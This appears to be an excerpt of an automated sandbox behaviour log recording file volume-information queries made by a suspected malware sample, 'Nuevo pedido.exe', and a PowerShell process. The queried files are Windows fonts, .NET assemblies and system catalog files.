Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Users\user\Desktop\Nuevo pedido.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
